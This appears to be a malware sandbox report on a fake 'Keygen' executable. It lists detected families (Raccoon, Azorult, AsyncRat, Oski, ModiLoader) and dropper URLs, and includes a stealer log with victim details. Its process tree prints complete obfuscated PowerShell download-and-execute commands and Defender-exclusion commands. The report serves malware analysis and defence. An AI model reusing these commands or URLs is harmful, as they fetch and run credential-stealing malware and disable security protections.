Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    150s
  • max time network
    162s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (95) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 01:53:33 GMT Bot_ID: 664A9041-4AC4-46F3-B3DC-87DB4D57890E_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 5 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: GOHCSFBB - Username: Admin - Windows version: NT 10.0 - Product name: Windows 10 Pro - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 4095 MB (843 MB used) - Screen resolution: 1280x720 - Display devices: 0) Microsoft Basic Display Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 4 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 1 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 27 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies registry class 3 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (95) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (95) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3956
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2EC6.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (95) — ?????.exe""
      2⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1508
      • C:\Users\Admin\AppData\Local\Temp\2EC6.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:2088
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\2EC6.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3024
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3272
          • C:\Users\Public\png.exe
            "C:\Users\Public\png.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4924
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:5060
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:4248
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 4248 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\752566743221973\\* & exit
                  8⤵
                    PID:3524
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 4248
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5100
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:5096
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:4276
              • C:\Users\Public\png.exe
                "C:\Users\Public\png.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                PID:4176
                • C:\Users\Admin\AppData\Local\Temp\PdnCqbL3Dd.exe
                  "C:\Users\Admin\AppData\Local\Temp\PdnCqbL3Dd.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4312
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\PdnCqbL3Dd.exe"'
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2528
                • C:\Users\Admin\AppData\Local\Temp\1SG1l5Bx4Q.exe
                  "C:\Users\Admin\AppData\Local\Temp\1SG1l5Bx4Q.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2136
                  • C:\Windows\SysWOW64\Notepad.exe
                    "C:\Windows\System32\Notepad.exe"
                    8⤵
                      PID:5560
                  • C:\Users\Admin\AppData\Local\Temp\elKnDuihQa.exe
                    "C:\Users\Admin\AppData\Local\Temp\elKnDuihQa.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of SetWindowsHookEx
                    PID:1284
                    • \??\c:\windows\SysWOW64\cmstp.exe
                      "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\raie5qht.inf
                      8⤵
                        PID:1436
                    • C:\Users\Admin\AppData\Local\Temp\qm5M4J91Ff.exe
                      "C:\Users\Admin\AppData\Local\Temp\qm5M4J91Ff.exe"
                      7⤵
                      • Executes dropped EXE
                      • Windows security modification
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5084
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" Get-MpPreference -verbose
                        8⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3680
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\png.exe"
                      7⤵
                        PID:5020
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /T 10 /NOBREAK
                          8⤵
                          • Delays execution with timeout.exe
                          PID:4352
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\2EC6.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2240
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2064
              • C:\Windows\SysWOW64\timeout.exe
                timeout 1
                3⤵
                • Delays execution with timeout.exe
                PID:2688
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\2EC6.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4048
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
